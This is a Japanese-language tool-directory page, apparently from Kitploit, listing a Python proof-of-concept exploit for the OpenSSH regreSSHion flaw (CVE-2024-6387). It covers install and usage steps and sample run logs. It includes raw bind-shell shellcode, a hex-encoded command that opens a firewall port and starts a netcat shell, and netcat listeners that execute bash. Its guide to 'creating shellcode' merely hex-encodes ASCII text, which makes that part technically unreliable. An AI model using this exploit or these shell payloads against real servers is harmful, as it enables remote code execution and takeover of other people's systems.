Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-6387 — regreSSHionエクスプロイトの概念実証pythonスクリプト | Kitploit
ツール/GitHubGitHub/l-urk/cve-2024-6387
脆弱性分析エクスプロイトシェルコードネットワークセキュリティペネトレーションテストリモートアクセスツールシェルコード生成ペイロード開発バイナリエクスプロイト
GitHubl-urk/cve-2024-6387

CVE-2024-6387

regreSSHionエクスプロイトの概念実証pythonスクリプト

125101年前未レビュー
リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-6387 regreSSHion

regreSSHionエクスプロイトの概念実証Pythonスクリプト。バージョン0.2.1 build POC regreSSHion-green-banner

インストール

root@kitploit:~
git clone https://github.com/l-urk/CVE-2024-6387.git
root@kitploit:~
cd CVE-2024-6387
root@kitploit:~
pip3 install -r requirements.txt
root@kitploit:~
python3 regreSSHion.py -h

使用方法

root@kitploit:~
🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

usage: regreSSHion.py [-h] -i IP -p PORT [-t] [-c] [-d] [-r] [-x] [-y] [-z]

🔒 CVE-2024-6387 regreSSHion remote code execution vulnerability exploit script

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target SSH server IPv4 ( format: -i 0.0.0.0 )
  -p PORT, --port PORT  target SSH server port number ( format: -p 22 )
  -t, --time            ENABLE TIME displayed on all log output ( format: -t )
  -c, --clear           CLEAR SCREEN before running the exploit ( format: -c )
  -d, --debug           enable see the DEBUG LOGS output on run ( format: -d )
  -r, --repeat          enable to REPEAT EXPLOIT until RCE wins ( format: -r )
  -x, --skipssh         enable this to SKIP SSH HANDSHAKES ( format: -x )
  -y, --skipheap        enable this to SKIP HEAP and parse ( format: -y )
  -z, --skipfinal       enable this to SKIP FINAL ID CHECK ( format: -z )

🔒 Affected OpenSSH Versions: 1.2.2p1 ~ 4.4 and 8.5p1 ~ 9.8

🔒 contact: github.com/l-urk - x.com/l_urkk

スクリプトを使用するには、python3でregreSSHion.pyを起動します。

  • IPは脆弱なSSHサーバーのIPv4アドレスに設定します
  • ポートは脆弱なSSHサーバーのポート番号に設定します
root@kitploit:~
python3 regreSSHion.py --ip 127.0.0.1 --port 22
root@kitploit:~
2024-08-03 22:42:55,944 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:42:55,945 - INFOS - Connection established
2024-08-03 22:42:55,945 - INFOS - Performing SSH handshake...
2024-08-03 22:43:05,014 - INFOS - Received KEX_INIT (5 bytes)
2024-08-03 22:43:05,015 - INFOS - SSH handshake successful.
2024-08-03 22:43:05,015 - INFOS - Preparing heap...
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 1
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 2
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 3
2024-08-03 22:43:05,015 - INFOS - Sent tcache chunk 4

スクリプトでここまで進んだと仮定しましょう...

root@kitploit:~
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 3
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 4
2024-08-03 22:46:45,858 - INFOS - Sent fake file structure 5
2024-08-03 22:46:45,858 - INFOS - Sent large string
2024-08-03 22:46:45,858 - INFOS - Heap preparation complete.
2024-08-03 22:47:05,879 - INFOS - Estimated parsing time: 0.000056 seconds
2024-08-03 22:47:05,880 - INFOS - Final packet sent successfully.
2024-08-03 22:47:05,880 - INFOS - Verifying exploit success.
2024-08-03 22:47:15,890 - WARN! - No response received for verification.

"exploit verification success"と表示されれば、ペイロードの配信と実行に成功しています。 スクリプトは成功するまで数回試行します。 成功メッセージが表示される感覚をつかむまで、ご自身の脆弱なSSHサーバーで試してみることをお勧めします。

root@kitploit:~
2024-08-03 22:47:15,891 - ERROR - Exploitation failed.

デバッグモード

  • デバッグモードを有効にすると、より詳細な出力が得られます。受信したSSHバージョン文字列、パケット長情報、その他ログに記録可能なほぼすべての情報が表示されます。
root@kitploit:~
python3 regreSSHion.py --ip 127.0.0.1 --port 22 --debug

出力例:

root@kitploit:~
2024-08-03 22:44:53,962 - DEBUG - Logging is set to DEBUG level
2024-08-03 22:44:53,962 - INFOS - Attempting to connect to 127.0.0.1:22 (attempt 1)
2024-08-03 22:44:53,963 - INFOS - Connection established
2024-08-03 22:44:53,963 - INFOS - Performing SSH handshake...
2024-08-03 22:44:53,963 - DEBUG - Sent SSH version string.
2024-08-03 22:44:53,963 - DEBUG - Waiting to receive SSH version string
2024-08-03 22:45:03,256 - DEBUG - Received SSH version string: SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1
2024-08-03 22:45:04,373 - INFOS - Received KEX_INIT (4 bytes)
2024-08-03 22:45:04,373 - INFOS - SSH handshake successful.
2024-08-03 22:45:04,373 - INFOS - Preparing heap...

シェルコードペイロード

デフォルトのシェルコードは、ufwを使用して受信ポート9999を開放し、ポート9999でncリスニングシェルを起動します。

root@kitploit:~
    shellcode = b"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x01\x51\x53\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xb0\x66\x31\xdb\xb3\x02\x68\x7f\x00\x00\x01\x66\x68\x27\x0f\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\xb3\x05\x56\x56\x89\xe1\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

シェルコードペイロードの作成

独自のシェルコードペイロードを作成するには、ASCIIから16進数へのエディタを使用し、手動でシェルコードに変換します。このASCII-to-hexウェブサイト(https://www.rapidtables.com/convert/number/ascii-to-hex.html)を使用しています。

  • シェルコードにしたいテキストを入力します。
  • 設定で「User defined」を選択し、入力ボックスに「\x」を指定します。
  • すべての大文字のXを小文字のxに置き換えます。
  • メモ帳など、文字置換機能のあるプログラムを使用します。
  • 16進数文字列の末尾にある最後の\xを先頭に移動します。
  • シェルで解釈されるよう、両端に引用符を追加します。

シェルコードペイロードの例

hello world

root@kitploit:~
"\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

printf hello world

root@kitploit:~
"\x70\x72\x69\x6E\x74\x66\x20\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64"

make test file

root@kitploit:~
"\x74\x65\x73\x74\x20\x3E\x20\x74\x65\x73\x74"

Allow incoming connections on port 9999 & open a nc shell on port 9999

root@kitploit:~
"\x75\x66\x77\x20\x61\x6C\x6C\x6F\x77\x20\x39\x39\x39\x39\x20\x26\x26\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x6E\x63\x20\x2D\x6C\x76\x70\x20\x39\x39\x39\x39\x20\x2D\x65\x20\x2F\x75\x73\x72\x2F\x62\x69\x6E\x2F\x73\x68"

send_socket.py

シェルコードペイロードの実行をテストしたい場合は、send_socket.pyスクリプトを使用できます。 使用方法:

root@kitploit:~
usage: send_socket.py [-h] [-i IP] [-p PORT] [-s SHELLCODE]

send shellcode to a target socket (ip and port)

options:
  -h, --help            show this help message and exit
  -i IP, --ip IP        target ip address (default: 127.0.0.1)
  -p PORT, --port PORT  target tcp socket port (default: 1111)
  -s SHELLCODE, --shellcode SHELLCODE
                        shellcode hex to send in format: \x00\x00\x00\...etc (default: F13)

送信側:

root@kitploit:~
python3 send_socket.py -i 127.0.0.1 -p 1111

受信側:

  • 生テキストでの解釈
root@kitploit:~
nc -lvp 1111
  • シェル実行
root@kitploit:~
nc -lvp 1111 -e /usr/bin/bash
ツールをダウンロード